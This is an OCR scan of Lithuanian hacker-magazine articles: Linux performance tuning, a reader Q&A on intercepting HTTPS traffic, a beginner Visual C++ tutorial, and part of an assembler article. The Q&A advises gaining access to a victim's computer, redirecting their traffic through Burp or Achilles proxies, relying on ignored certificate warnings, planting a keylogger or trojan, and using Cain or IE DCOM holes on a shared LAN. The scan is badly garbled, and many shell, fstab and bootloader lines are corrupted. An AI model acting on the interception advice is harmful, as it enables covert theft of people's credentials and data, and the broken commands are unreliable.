tam tikro serviso, ar ne. FC atveju servisų konfigūravimui 
naudojamas system-config-services įrankis, o Mandrake 
sistemoje — drakxservices. 

Siekiant taupyti laiką ir žurnalo vietą, apsistosime tik ties 
tais servisais, kurie daugeliu atvejų įjungti pagal nutylėjimą, 
tačiau nėra reikalingi namų vartotojui — juos galima 
drąsiai atjungti: 

/acpid — valdo ACPI įvykius. 
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/ anacron, atd, crond — demonai-planuotojai (nurodytu laiku 
paleidžia nurodytas komandas). Paprastam namų vartotojui to 
visiškai nereikia. Nesuprantu kūrėjų logikos: taip, galbūt vartotojui 
ir reikalingas planuotojas, tačiau kam iš karto trys? 

/ apmd — reikia palikti tik nešiojamuosiuose kompiuteriuose. 
/cpuspeed — pakeičia CPU dažnį ir taip taupo energiją, reikalingas 
nešiojamuosiuose kompiuteriuose. 

/ haldaemon naudojamas norint sekti pasikeitimus sistemos 
aparatūroje. Šiaip jis nėra reikalingas — pakanka po naujos įrangos 
įdiegimo paleisti kudzu. 

/ cups* — spausdinimo sistema. CUPS naudinga tik tuo atveju, 
kada spausdintuvas naudojamas kiekvieną dieną. Jeigu spaus- 
dintuvo neturi arba spausdini tik kartkartėmis, tuomet šį servisą 
galima atjungti. Kai turėsi spausdintuvą, galėsi šį servisą paleisti 
su komanda „service <serviso-pavadinimas >". 

/isdn — ar pas tave yra ISDN? Ne? Tuomet kam tau šitas servisas? 
/ kudzu — šį „žvėrį“ galima paleisti rankiniu būdu. Tai paprastai 
daroma po to, kai į kompiuterį buvo įdiegta nauja aparatūra. Kudzu 
naudojamas naujiems įrenginiams rasti (Mandrakė sistemoje 
vietoje kudzu naudojamas harddrake2). 

/Im sensors — naudojama įvairiems sistemos davikliams stebėti 
(pavyzdžiui, procesoriaus temperatūrai) 

/ messagebus — transliuojančių sistemos pranešimų siuntinėjimo 
„Magistralė“, išjunk ją. 

/ mdmonitor — naudojamas programinių RAID masyvų stebėjimui, 
o likusiais atvejais (kai RAID nėra naudojamas) tiesiog nereika- 
lingas. 

/ netfs — reikalingas įvairioms tinklinėms failų sistemoms, taip pat 
ir SMB, todėl neišjunk šio serviso, jeigu tavo tinkle yra kompiuterių 
su Windows ir tau reikia su jais keistis informacija bei dalintis 
resursais. 

/ mDNSResponder, nifd — tiesiog išjunk ir pamiršk. Aprašyme 
sakoma, kad jie turi būti paleisti How! klientuose, kad Zeroconf 
servisas galėtų ištyrinėti tinklą. Nevisai supranti, apie ką aš? Aš 
irgi. Taigi išjungiam. 

/ pcmcia — šis servisas reikalingas tam, kad palaikytų PCM- 
CIA plokštes, kurios, kaip mes visi gerai žinome, naudojamos 
nešiojamuosiuose kompiuteriuose. 

/ portmap — vargu ar pravers namų vartotojui, kadangi šis servisas 
naudojamas RPC susijungimams valdyti (reikalingas, jeigu naudoji 
NIS ir NFS). 

/ rpc* — atjunk visus RPC (nuotolinis procedūrų iškvietimas) 
palaikymo servisus. 


/ smartd — reikalingas SMART (Self Monitoring and Reporting 
Technology) įrenginiams. SMART sąsaja naudojama tam, kad 
Įrenginiai galėtų patys save testuoti. Galimybę ją naudoti suteikia 
kai kurie kietieji diskai, todėl jeigu nori žinoti, kada tavo diskas 
„planuoja“ Išeiti iš rikiuotės, neišjunk šio serviso. 

/'sshd - leidžia per atstumą prisijungti prie tavo sistemos. Namų 
kompiuteryje galima drasiai atjungti. 

/sendmail — jeigu artimiausiu metu neplanuoji konfigūruoti savo 
SMTP serverio, o paštą vis dar siunti per savo tiekėjo SMTP išjunk 
|. Bet kokiu atveju, išjunk jį iki tol, kol tavo rankos neprieis prie 
jo konfigūravimo. 

/(hnsd — servisas naudojamas automatiniam kompanijos Red 
Hat produktų atnaujinimui. Aš paprastai jį atjungiu. 

/irgbalance reikalingas SMP mašinose. 


Mes ką tik ne tik paspartinome savo sistemą, bet ir šiek tiek 
padidinome jos saugumą. Juk kiekvienas paleistas servisas — tai 
potenciali saugumo skylė. Dabar perkrauk kompiuterį, kad galėtum 
pajausti, kaip greičiau pradėjo krautis tavo sistema. Tačiau ties tuo 
mes nesustosime. 


(Virtualios atminties kiekio padidinimas] Konsolėje surink 
komandą free. Kiek virtualios atminties (fizinė atmintis plius 
swap byla) dabar laisva? Jeigu viskas užimta, pavyzdžiui, liko 
keletas megabaitų fizinės atminties ir lygiai tiek pat swap srit- 
vie, tai reiškia, kad atminties katastrofiškai trūksta. Geriausias 
patarimas — nusipirkti papildoma atminties modulį, tačiau kol 
kas pabandykime sukurti papildomą swap bylą, kuri pridės keletą 
megabaitų virtualios atminties. Įvykdyk komandą: 
4 dd iI=/dev/zero of=/sw-file bs= Im count —64 

Taip mes sukursime tuščią 64 Mb dydžio bylą /sw- file. Jeigu reikia 
daugiau, sukurk 128 ar 256 Mb bylą - tai neturi reikšmės, svarbi- 
ausia, kad tau užtektų disko vietos. Dabar iš šios bylos padarysime 
swap bylą (64/1024); 


+ mkswap /sw-file 65536 


Services and deamons 


alsa stopped Info X Onboot Start Stop 
apmd running Info x Onboot Start Stop 
atd running Info | X Onboot Start | Stop 
chargen Info) Start when reguested 

chargen-udp Info Start when reguested 

crond running Info x On boot Start Stop 
cv5 Info Start when reguested 

daytime Info Start when reguested 

daytime-udp Info Start when reguested 

devisd running Info | X Onboot Start Stop 
dm running Info | X Onboot Start Stop 
echo Info Start when reguested - 

Cancel Ok 


1, konfigūratorius drakxservices 
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Telieka aktyvuoti naująjį swap'ą: 
4 swapon /sv-lilo 


Kad pastarosios komandos nereikėtų įvedinėti kiekvieną kartą 
leidžiant sistemą, įrašyk ją į užsikrovimo skriptus (pageidau- 
tina po komandos swapon -a). Tai laikinai išspręs problemas 
su operatyvinė atmintimi. Atkreipk dėmesį, jog komfortiškam 
darbui Linux sistemoje (naudojant X Windows ir KDE/GNOME) 
reikia mažiausiai 192 Mb fizinės operatyvinės atminties ir 
bent jau 128 Mb swap'o. Mano mašinoje vaizdelis toks: iš 
256 Mb fizinio RAM laisva tik 4 Mb, tačiau swap praktiškai 
laisvas paprastai būna užimti tik keli megabaitai (mano 
swap byla taip pat yra 256 Mb). 


ĮSwap'o tiuningas] Vien tik paprastai pridėti keletą papildomų 
swap atminties megabaitų maža. Svarbu tiksliai sukonfigūruoti patį 
virtualios atminties mechanizmą, kitaip tariant, teisingai nurodyti 
„keitimo“ (swappiness) koeficientą. 

Tarkim, darbo metu mums tenka naudoti keletą ganėtinai griozdiškų 
programų ir periodiškai tarp jų persijungti. Gali būti, jog tu dirbi 
su dokumentais, todėl nuo pat ryto paleidi 00 Writer, 00 Calc, 
Firefox ir persijunginėji tik tarp jų. O vakare pasileidi xmms, kadangi 
neįsivaizduoji darbo be muzikos. 

Jeigu nurodysi didelę keitimo koeficiento reikšmę (byla /proc/sys/ 
vm/swappiness), tarkim, 90 arba net 100 (maksimali reikšmė), tai 
persijungimas tarp programų vyks gana lėtai, tačiau pagrindinės 
programos našumas bus maksimalus. 

Jeigu tau ištisą dieną reikia dirbti su nedidelėmis programomis 
ir dažnai tarp jų persijunginėti, tai Keitimo koeficiento reikšmę 
geriau nurodyti 20 arba 30 srityje. Paeksperimentuok su skirtingais 
parametrais — tiktai taip galima parinkti geriausią reikšmę. Išvesti 
einamą swappiness galima su komanda 


2 (at /prod/sys/rm/swappiness 
Visiškai įmanoma, kad tau labiausiai tiks 70 (reikšmė pagal 
nutylėjimą). Nurodyti naują reikšmę (šiuo atveju 20) galima su 
komanda 


4 echo „20“ > /pro(/sys/vm/swappiness 


2. branduolio Konfigūravimas 
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ĮĮvedimo/išvedimo planuotojo darbo pakeitimas] Kiekvienai 
Linux sistemoje veikiančiai programai kartkartėmis reikia prieiti 
prie disko — nuskaityti duomenis arba įrašyti juos į diską. Už 
įvedimo/išvedimo planavimą atsakinga branduolio dalis taip ir 
vadinasi — įvedimo/išvedimo planuotojas. Yra keturi skirtingi 
planuotojo darbo algoritmai: 

/ Režimas pagal nutylėjimą (n00p) — vargu, ar jis tiks pažangiam 
vartotojui, nepaisant net to, kad jis naudojamas pagal nutylėjimą. 
Algoritmo esmė — tai paprasta FIFO (First In First Out — Pirmas 
Atėjai, Pirmas Išėjai) tipo eilė. 

/ Numatomas planavimas (Anticipatory Scheduling) — Kai programa 
iš disko nuskaitinėja duomenis, branduolys bando atspėti, kokius 
duomenis programa skaitys kitos skaitymo operacijos metu. Jeigu 
branduolys teisingai nuspėjo programos „mintis“, tai šis algoritmas 
leis iš esmės padidinti sistemos našumą. Be to, šio algoritmo 
efektyvumas smarkiai priklauso ir nuo programos logikos. 


elevator-- 05 


/ „Sąžininga“ eilė (Complete Fairness Oueuing) — visų programų 
teisės lygios. Branduolys tolygiai planuoja kiekvienos programos 
įvedimo/išvedimo operacijas, čia nėra kokių nors programų, kurios 
gali monopolizuoti priėjimą prie disko. Jeigu keletas programų 
vienu metu bandys prieiti prie disko, visos jos gaus atsakymą. Sis 
metodas kai kuriais atvejais leidžia padidinti sistemos našumą, 
o kai kuriais -— priešingai, bendras našumas krenta, nes viskas 
priklauso nuo konkrečių užduočių. 


[7 tiuningo įrankiai] 

m Pašalinam nereikalingus servisus 

m Padidinam virtualios atminties apimtį 
m Sukonfigūruojam branduolį 

= Patiuninam procesų planuotoją 

= Optimizuojame FS nustatymus 

a Įdiegiame naują inicializavimo sistemą 
= Pakeičiame failų sistemą 
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elevator dą 


/ Deadline planavimas arba paskutinių terminų planavimas (Dead- 
line Oueuing) — visos priėjimo prie disko prašančios programos 
statomos į eilę. Iš eilės imama viena programa, kuri ir gauna 
praktiškai monopolišką priėjimą prie disko. Kol ši programa dirba, 
visos likusios laukia eilėje. Praėjus tam tikram laikui, planuotojas šią 
programą perveda į laukimo būseną ir persijungia prie kitos iš eilės 
po pristabdytosios einančios programos. Dabar antroji programa 
gauna dominuojantį priėjimą prie disko. Tada trečia, ketvirta ir t.t. 
Pavyzdžiui, šis metodas gerai tinka duomenų bazių serveriui. 

Č 

levator- deadline 
Kiekvienas algoritmas turi savų privalumų ir trūkumų. Vis dėlto 
paprastam namų kompiuteriui tinka tik du algoritmai — as ir cfą. 
Norint pakeisti planuotoją, nereikia perkompiliuoti viso branduo- 
lio: pakanka užsikrovimo metu perduoti parametrą elevator. Kad 
kiekvieną kartą šios operacijos nereikėtų vykdyti rankiniu būdu, savo 
užkroviklio konfigūracijos byloje panaudok šią konfigūraciją: 


/etc/lilo.cont liagmentas 
image = /boot/ymlinuz-2.6.9 
label Linux 
root /dev/hdal 
append  “elevator as 
Aoot/grub/grub.conf fragmentas 
title My Default Linux 
root“ (hd1,0) 
kone! /boat/vmlinuz-2.6.9 10“ 1001 
olovator 05 


“ 


/dev/hdal 


LILO atveju paredagavęs bylą nepamiršk su komanda „lilo“ 
perrašyti užkroviklio. 


[Branduolio konfigūravimas] Padidinti sistemos našumą padės 
teisingai sukonfigūruotas branduolys. Konfigūruojant branduolį 
reikia laikytis šių taisyklių: 

/ Atjunk nenaudojamas įrenginiu, protokolų, realizacijų ir t.t. tvarkykles. 
/ Dažniausiai naudojamus modulius gali įtraukti į branduolį. Taip, 
modulis — tai gerai, tačiau jeigu kodas yra branduolio sudėtyje, 
nereikia eikvoti laiko jo užkrovimui iš disko. 

Tik nepersistenk — viskam yra ribos. Galima viska atjungti ir palikti 
minimumą, o po to norint prijungti draugelio atsineštą flash kortelę 
teks iš naujo perkompiliuoti branduolį — kam tau to reikia? 
Trumpai priminsiu branduolio perkompiliavimo komandas: 


make menuconfią arba make xconfią 
make bzimage 

make modulos 

make modules install 

make install 
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Pirmoji komanda paleidžia branduolio konfigūratorių: menucon- 
fig veikia ncurses pagrįstame tekstiniame režime; xconfig veikia 
grafiniame režime. Antroji komanda kompiliuoja branduolį. Trečioji 
ir ketvirtoji sukompiliuoja bei įdiegia modulius. Paskutinė — įdiegia 
branduolį, kuris buvo sukompiliuotas su antra komanda. 


ĮNaujos inicializavimo sistemos įdiegimas] Eksperimentinė 
inicializavimo sistema initng leidžia Linux užkrauti praktiškai 
akimirksniu. Šios sistemos įdiegimui ir nuodugniam 
sukonfigūravimui gali tekti sugaišti porą valandų, tačiau 
patikėk manimi -— rezultatai to verti. Praktiškai visuose Linux 
distributyvuose pagal nutylėjimą naudojama sena gera pro- 
grama init. Būtent ji atlieka visą rutinišką sistemos inicializavimo 
darbą. Tačiau „atlieka“ pasakyta per garsiai. Pagal savo 
prigimtį init ganėtinai tingi: viskas, ką ji daro, — išanalizuoja 
bylą /etc/inittab ir, priklausomai nuo jos turinio, paleidžia /etc/ 
rc.d kataloge saugomus skriptus, kurie parašyti su komandų 
interpretatoriumi. Naujojoje inicializavimo sistemoje skriptų 
vykdymu užsiima pati initng. ko rezultate Linux kraunasi 
žymiai greičiau. 

Išsamiau apie tai gali paskaityti praėjusiame mūsų žurnalo numer- 
yje publikuotame straipsnyje „Žaibiškas tukso užkrovimas“. 


[Failų sistema] Dar prieš keletą metų nė vienas distributyvas 
Iš kietojo disko neišspausdavo visko, kas įmanoma, todėl dis- 
kas veikdavo vėžlio greičiu ir ji tekdavo paspartinti su hdparm. 
Dabar vargu ar su šia programa galima iš esm ės pakeisti disko 
našumą, kadangi tai už mus jau padarė patys distributyvų 
kūrėjai. Tačiau čia vis dar įmanoma kai ką paoptimizuoti: galima 
arba pakeisti ext3fs i reiserfs/xfs/jfs, arba pasirinkti sau optimalų 
ext3fs režimą. Pats greičiausias režimas yra grįžtamojo įrašymo 
režimas (writeback), kadangi šiuo 
atveju į žurnalą įrašomi tik failų sis- 
temos metaduomenų pasikeitimai. 
Algoritmą galima pakeisti byloje 
/etc/fstab, pavyzdžiui: 


4 vi /etV Istab 
/dav/hdal/ ext3 data  witoback 1 0 
Pats lėčiausias režimas Journal 
protokoluoja visus failų sistemos 
bei metaduomenu pasikeitimus. Or- 
dered įrašinėja tik metaduomenų 
pasikeitimus, tačiau tai daroma prieš 
pat pakeitimą. Šio režimo pasirinkti 
nereikia, kadangi jis naudojamas pagal 
nutylėjimą. 
Našumą taip pat gali padidinti kai ku- 
rios montavimo vėliavėlės, pavyzdžiui, 
noatime. Po kiekvieno priėjimo prie by- 
los jos inode atnaujinamas paskutinio 
priėjimo prie bylos laikas, kuris prak- 
tikoje naudojamas labai retai. Noa- 
time parametras atjungia paskutinio 
priėjimo laiko atnaujinimą, kas leidžia 
padidinti failų sistemos greitaveiką. 


4 vi /ei/ Istah 
/dev/hdol ext3 
10 


nootime,dato = writeback 


Tuo naminio tukso tiuningą galima 
laikyti baigtu. Jeigu dar turi kokių nors 
klausimų — drąsiai rašyk. 


N 
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Ar yra kokia nors galimybė perimti vartotojo 
HTTPS srautą? Pagal idėją, SSL technologija 
visiškai eliminuoja tokią galimybę. 


Pradėti vertėtų nuo to, kad SSL gali būti panaudota 
skirtingai. Idealiu atveju tiek klientas, tiek ir serveris 
turi turėti savo sertifikatą — tuomet gaunamas 
maksimalus saugumas. Tačiau tokį požiūrį aš buvau 
sutikęs tik hakerių forumuose, kai tuo metu paprastos 
svetainės ir net banko apskaitos sistemos to vengia. Jeigu 
sertifikatai naudojami tik serverio pusėje, tuomet perimti 
duomenis teoriškai įmanoma, tačiau reikėtų įvertinti keletą 
sąlygų. 
Visų pirma, tau teks vartotojo prisijungimą sukonfigūruoti 
taip, kad visas HTTP srautas eitų per tavo iš anksto 
paruoštą proxy serverį, o tam tu turėsi gauti priėjimą prie 
aukos kompiuterio. Antra, vartotojas neturėtų atkreipti 
dėmesio (greičiausiai neatkreips, kas būdinga 9996 
vartotojų) į naršyklės perspėjimą, jog gauti SSL duomenys 
nesutampa su serverio sertifikatu (savaime suprantama, 
proxy serverio sertifikatas skirsis nuo serverio sertifikato). 
Visa kita — technikos arba, konkrečiau šnekant, spe- 
cialios programinės įrangos, reikalas. Aš žinau du HTTPS 
proxy serverius, kurie leidžia perimti ir modifikuoti per juos 
praeinančius duomenis. Tai Burp proxy (http://portswig- 
ger.net/proxy/) ir Achilles (www.mavensecurity.com/achil- 
les). Iš jų ypatingai geras yra Burp proxy. Dėl pažangios 
paieškos ir reguliariųjų išraiškų galimybės surasti reikiamą 
informaciją perimtų duomenų masėje bus paprasčiau nei 
paprasta. Dar daugiau, bet kokius serveriui perduodamus 
parametrus ir formų reikšmes galima lengvai modifikuoti 
su interaktyviu įrankiu, o kitus duomenis prireikus galima 
pataisyti su šešioliktainiu redaktoriumi. Jeigu perimantysis 
proxy serveris įdiegtas nutolusiame kompiuteryje, tai tau 
labai praverstų ir programos web sąsaja, atvaizduojanti 
programos logus. 
Iš kitos pusės, jeigu tau pavyks pakeisti vartotojo susijungi- 
mo konfigūraciją, tai kas tau trukdo pas jį įdiegti keyloggerį 
arba trojaną, kurie surinktų visus formose įvedamus du- 
omenis? SSL susijungimas apsaugo tik kliento-serverio 
atkarpą, o nuo lokalaus užpuolimo tikrai neapgins. 
Jeigu tu esi viename lokaliame tinkle kartu su auka, 
tuomet gali taip pat sėkmingai įdarbinti ir cain arba pasi- 
naudoti IE DCOM skylėmis. 
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„C“ nuo nulio 


C KODAS TAVE VERČIA JAUSTIS LYG 
PATEKUS | AKLIGATV|? DAUG PUSLAPIŲ 
UŽIMANTYS EKSPLOITŲ LISTINGAI TAU 
NIEKO NESAKO? DRAUGAI IŠ TAVĘS JUO- 


KIASI, O MAMA TAU ANT KAKLO PRIRIŠA 
KEPTĄ MĖSOS GABALĄ, KAD SU TAVIMI 
DRAUGAUTŲ BENT ŠUNIUKAI? KAIP 
REIKIANT APSIRŪPINK ENERGETINIAIS 
GERIMAIS — JŲ TAU PRIREIKS. TUOJAU 
TU PROGRAMUOSI SU C. 


[Prisijunk!] Žinai, pastaruoju metų man susidarė toks 
jausmas, kad mūsų, C programuotoju, lieka vis mažiau 
ir mažiau. Visi pabando Delphi ir toliau su juo draugauja. 
Delphi patogus daikčiukas. Jame susipainioti taip 
pat praktiškai neimanoma tai tau ne C. O pas mus 
kompiliatorių daugybė, vystymo aplinkos iš viso ne visada 
pridedamos, o be jų toli gražu ne kiekvienas programuo- 
tojas susigaudys, kas, kur ir kaip. Vargu ar tai įkvėps tuos, 
kas priprato prie Delphi. Tarkim, kieno nors straipsnyje 
pateikiamas C kodas. Kas parašyta — aišku, o kaip tai 
panaudoti — nelabai. Žinai, aš tavęs nekankinsiu su sin- 
takse arba išsamia visų vieno ar kito kompiliatoriaus raktų 
dokumentacija manau, kad tu ir be to turi ką veikti. 
Aš tiesiog pačiu banaliausiu būdu parodysiu, kaip sukurti 
projektą ir pradėti jame ką nors rašyti. Ka tik nori. Kad ir 
Hello world, kad ir RAT. 


[Naujas projektas] Šiuolaikinės programavimo sistemos 
dar žalią programuotoją lengvai išmuša iš vėžių tuo, kad jam 
suteikia visas įsivaizduojamas ir nelabai galimybes. Sako, 
nori, mes tau duosim iš karto visą Word aplikacijos šablono 
pavidalu? Arba, atseit, nori savo projekte turėti MFC, ATL, 
VCL ir dar milijoną įvairių dalykėlių? O, siaube! Šalin! Šalin, 


demonai! Mums viso šito nereikia. Mums reikia paprasto ir tuščio 
projekto. Jį galima gauti remiantis šiuo paprastu algoritmu: 

/ Paleisk Studio (arba 6.0 atveju — patį C). 

/ Pasirodžiusioje aplinkoje spausk 

File -> New -> Project. 

/ Mus domina įprastinė win32 C aplikacija, todėl pereik | skyrelį 
Visual C+ + Projects ir pasirink Win32 Project. Visa kita, ką siūlo 
Studio, yra erezija, todėl čia nėra ko aptarinėti. Fu. 

/ Apačioje nurodyk projekto pavadinimą ir kur jį išsaugoti, o tada 
spausk OK. 

/ Turėtų pasirodyti siaubingas Win32 Application Wizard. Jeigu |i 
paliktumėme be dėmesio ir iš karto nuspaustumėm Finish, tavo 
projektas būtų prifarširuotas tonomis svetimo ir visiškai nenaudingo 
kodo. Vedlyje pereik į skyrelį Application Setting. 

/ Čia derėtų pastebėti, kad tavo kuriama programa — Windows 
Application, ir kad projektas turėtų būti tuščias (Empty project). Net 
jeigu tu nori konsolinės aplikacijos, vis tiek viską palik būtent taip, 
aš vėliau paaiškinsiu, kaip užsiimti būtent Konsoliniu reikalu. 

/ Po visų tavo atliktų veiksmų prieš tave turėtų pasirodyti tuščias ir 
pilkas studijos langas, kuris nežada nieko įdomaus, tačiau mes jau 
galime pasigrožėti kairėje pusėje Solution Explorer lange matomu 
nauju projektu. 

/ Ant projekto pavadinimo (ne solution'o, o būtent projekto) 
spausk dešinį pelės klavišą ir pasirink Add -> Add new item. Mes 
norime į tuščią projektą įdėti byla, kurioje mes ir rašysime mūsų 
programą. 

/ Pasirink ++ File, įvesk vardą ir spausk OK. 


[Pabandykime apsispręsti] Aš savęs ir Microsoft neišdavinėsiu, 
todėl čia tu nerasi pasakymo „pabandykime apsispręsti dėl aplinkos 
ir kompiliatoriaus“. Tiksliau šnekant, neperskaitysi tiesioginiame 
kontekste. Čia viskas labai paprasta. Du žodžiai. Pirmas — Visual. 
Antras — Studio. Toks riebokas paketas, į kurį įeina Visual C+ +. 
Būtent pastarasis mums ir reikalingas. Mano manymu, nieko 
geriau nerasi. Esu tikras. Dabar rinkoje galima rasti visą debesį 
šio produkto versijų: 

MS VS 6.0 — mėgėjams štampuoti tvarkykles; 


MS VS .NET 2002 (7.0) — pirmoji šeštosios versijos žavesio 
nepraradusi studija, pritaikyta „NET; 

MS VS „NET 2003 mano nekenčiama versija, kurios projektų 
nenuskaito mano mylima septintoji versija; 

Ir lyg tai jau išėjusi, lyg ir ne, tačiau tikrų tikriausiai emulėje 
pasirodžiusi MS VS .NET 2005, kuri mano nuomone mūsų broliui 
absoliučiai nereikalinga. 

Ramiai pradžiai aš visada rekomenduoju imti septintą versiją. Gauk 
ją visais įmanomais bei neimanomais būdais ir džiaukis -— daugelis 
visų normaliam vartotojui trukdančių gyventi grožybių (slaptažodžių 
sniferiai ir t.t.) parašyta būtent su ja. 


[Pirmoji programa] Dabar prieš tave matosi atidaryta byla su 
praplėtimu cpp, kuri bus sukompiliuota, jeigu tu įlisi į Build meniu 
Ir nuspausi ten esantį punktą Build <projekto pavadinimas >. Ne- 
manyk, kad aš tau visą šį laiką tiktai kabinau ant ausų makaronus. 
Rodau, kaip tuo naudotis. 

Iš pradžių programoje iterpi visiems gyvenimo atvejams tinkančią 
antraštę: 

include < windows.h 
Tada apibrežk tuščią funkciją, nuo kurios prasidės programos vykdymas. 


Paprastose aplikacijose ši funkcija yra WinMain, konsolinėse - tiesiog 
main. 


+ WINAPI WinMain(HINSTANCE, HINSTANCE, PTSTR, int) 
retu 0; | 


Ji nieko nedaro, tiktai grąžina nulį. Mums ir nereikia, kad ji ką nors 
darytų. Aišku, įvairovės dėlei po pirmųjų figūrinių skliaustelių galima 
tterpti funkcijos MessageBox iškvietimą, kad nepasirodytų, jog visą 
šį laiką Mes rašėme programą kuri nieko nedaro. Prašau: 


4indude < windows.h > 


1 WINAPI WinMain(HINSTANCE, HINSTANCE, PTSTR, int) 
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MessogeBox(0, „Hello, World!“, „You are wonderful“, 0); 
return 0; 


|| 
| 


Jeigu tu retromaniakas ir nori konsolinės programos, tuomet mums 
iš pradžių teks linkeriui paaiškinti, kad mes konsolininkai, bei šiek 
tiek pakeisti pagrindinę funkciją. 


Aindude < windows. 

// prijungiame print ir kitų standartinių įvedimo/išvedimo unkciju antraštes 
Žindude < stdio.h > 

A pragma comment(linker,"/SUBSYSTEM:CONSOLE") 

int main(int argc, char “"argv) 


printt(„Hello, world!“)); 
return 0; 


Penktoje eilutėje pragma apibrėžia mūsų programos tipą. Lygiai taip 
pat sėkmingai vietoje CONSOLE ten galėtų puikuotis WINDOWS arba 
NATIVE. Pragma — žiauriai naudingas dalykas. Tarkim, užsimanysi, 
kad tavo helloworld užimtų viso labo 1 Kb. Teliks pridėti eilutę: 


/ pakeičiame stondortini kompiliatoriaus 
/ sukurta Iėjimo taško į mūsiški 
Žpiagmo comment (linker,"/ENTRY-WinMain") 


Ir iš programos dingsta praktiškai visi nereikalingi dalykai. Papildo- 
mai taip pat galima apjungti sekcijas /(MERGE raktas), pašalinti 
visokius tikrinimus, CRT ir analogišką šlamštą, tačiau aš pažadėjau, 
kad nekalbėsiu apie dokumentaciją. Tam skirtas MSDN, be kurio, 
beje, dar neapsiėjo nė vienas normalus Windows programuotojas. 
Jo must have koeficientas — 10096. Taigi kartu su Studio tau 
būtinai reikia gauti ir MSDN. Mielas Delphi programuotojau, tikiuosi, 
kad šios trumpos medžiagos tau pakaks tam, kad parašytum 
savo pirmąją C programą ir, kaip sakoma, tęstum savo darbus bei 
kompiliuotum. 
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Kompiliuojame 


ne;Manoma 

Iš neaišku kokio „asm“ kodo darome 
veikiančią programą 

INTERNETE GALIMA RASTĮ DAUGYBĘ 
ASEMBLERINIŲ LISTINGŲ, TAČIAU DAUGE- 
LIS IŠ JŲ YRA SMARKIAI IŠDARKYTI IR 
IŠSKAIDYTI. TOKIU PAVIDALU JŲ VISIŠKAI 
NEĮMANOMA PANAUDOTI. TIK DĖL TO 
KOMPLEKSUOTI NEVERTĖTŲ. ŠIAME 
STRAIPSNYJE PAPASAKOSIU APIE TAI, KAIP 
„SUŠUKUOTI“ KREIVĄ KODĄ, ĮTERPTI JĮ Į 
SAVO PROGRAMĄ, IŠSIRINKTI TEISINGĄ 
TRANSLIATORIŲ IR KOMANDINĖS EILUTĖS 
RAKTUS. 
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[Skirtingi asembleriai] Asembleris — tai ne tik kalba, bet ir translia 
torius. Tai, kad PDP-11 kalba netinka x86 architektūrai — visiškai 
suprantama, tačiau asemblerinių transliatorių tarpusavio nesuderi- 
namumas daugeliui tampa naujiena. Kas sudaro asemblerio kaip 
kalbos pagrindą? Pirma — tai mašininių komandų (mov, nop, cmp) 
mnemonika. Antra — tai pačios kalbos priemonės (žymės, direktyvos, 
makrosai). Formaliai už mnemoniką atsako Intel ir AMD. Būtent jos 
suteikia vardus mašininėms komandoms, registrams, vėliavėlėms 
ir t.t. Daugelis x86 asemblerių laikosi šio žymėjimo (nors jis niekur 
nestandartizuotas), tačiau „dauguma“ — tai dar ne viskas. *nix 
pasaulyje paplitusi ATėT sintaksė, kuri išsiskiria ne tik mnemonika, 
bet net ir operandų eiliškumo tvarka! Čia operandas imtuvas yra 
ne kairėje, kaip Intel asemblerio atveju, o dešinėje!!! Registrų pa- 
vadinimai prasideda procento ženklu, konstantos — dolerio ženklu, 
o instrukcijos turi apdorojamų duomenų tipą atitinkančią priesagą. 
Intel kalboje reikšmės 666h persiuntimas | eax registrą atrodo 
taip: „mov eax,666h“, o ATėT atveju taip: „mov! $666h,“6eax". 
Vieno tipo asembleriams skirta programa negali būti sukompil- 
iuota su kito tipo asembleriais, nebent viska radikaliai perdarius 
arba automatiškai sukonvertavus! Tačiau net ir to paties tipo 
asembleriuose galima pastebėti netvarką, neatitikimus ir daugybę 


skirtumų (raktiniuose žodžiuose, listingo apiforminimo taisyklėse, 
pateikiamose bibliotekose, antraščių bylose ir t.t.). Jeigu 
suderinamumas nėra aiškiai deklaruotas, programą reikia 
transliuoti su tuo ir tik su tuo asembleriu, kuriam ji skirta. 
Priešingu atveju ruoškis perdarymams, t.y. adaptacijai. Skir- 
tumai dažnai išlenda pačiose netikėčiausiose vietose. Kai 
kurie asembleriai supranta, kad „mov eax, x“ — tai tas pats, 
kas ir „mov eax,[x]“, kai kurie priešingai. Jie suklumpa 
ir pateikia klaidą. Tačiau tai dar nieko! Kur kas blogiau, kai 
transliatorius šią konstrukciją tyliai traktuoja kaip „mov eax, 
offset x“, kas visiškai ne vienas ir tas pats! Taigi perkeliant 
programą tenka būti labai atsargiam. 

Suderinamumas - visiškai atskira dainelė. Į MS-DOS orientuotos 
programos be keiksmažodžių ne tik negali būti transportuojamos, 
bet ir perkeliamos. Joms būdinga tiesioginė sąveika su aparatūrine 
įranga, kuri NT sistemose prieinama tik iš branduolio lygio, jau 
nė nekalbant apie tai, kad 16 bitų kodas 32 bitų programose 
iškviečiamas tik per DPMI (ir tai ne be gudrybių). Taip prieš 
transliuojant asemblerinę programą būtina išsiaiškinti, kokiam 
transliatoriui ir kokiai operacinei sistemai ji skirta! Su asemblerini- 
ais iš konteksto ištrauktais fragmentais būna dar blogiau. Tarkim, 
kokiame nors straipsnyje aprašomas įdomus antiderinimui skirtas 
metodas ir pateikiamas asemblerio kodas, tačiau čia nė puse lūpų 
neužsimenama apie tai, kaip ji įterpti į savo programą. Pažįstama 
situacija, tiesa? Betarpiška transliacija neįmanoma, kadangi 
transliatorius juodai keikiasi ir nieko daugiau nesako. 


[Tikslinės platformos nustatymas] Paprasčiausia nustatyti 
naudojamų duomenų bitų kiekį. Jeigu listinge dominuoja 16 
bitų AX/BX/CX tipo registrai, tai tokia programa veikiausiai skirta 
MS-DOS. Jeigu sutinkami tiesioginiai pertraukimų iškvietimai (INT 
21h, INT 13h, INT 16h, INT 10h) — tai tikrai MS-DOS, todėl geriau 
iš karto susilaikyti nuo bandymų transliuoti programą NT sistemoje. 
Tas pats pasakytina ir apie įvedimo/išvedimo jungtis (instrukcijas 
IN/OUT). Nors NT ir leidžia prie jų prieiti iš taikomojo lygio, tai nėra 
išeitis, todėl tokią programą paprasčiau perrašyti. 

32 bitų režima apibūdina registrai EAX/EBX/ECX. Tai gali būti tiek 
Windows, tiek ir DOS/DPMI skirta programa. Paskirtis Windows sis- 
temai atpažįstama pagal savo API funkcijas, o DOS/DPMI -— pagal 
pertraukimą INT 31h. Pertraukimas INT 2Fh byloja apie priklausomybę 
9x sistemoms, INT 2Fh/SYSENETR -— apie priklausomybę NT/XR 
Per šiuos pertraukimus įgyvendinamas priėjimas prie operacinės 
sistemos žemo lygio API, todėl tokios programos yra neperkelia- 
mos. Privilegijuotos apsaugoto režimo instrukcijos arba branduolio 
eksportuojamų funkcijų iškvietimai (pavyzdžiui, IoGetCurrentlrp- 
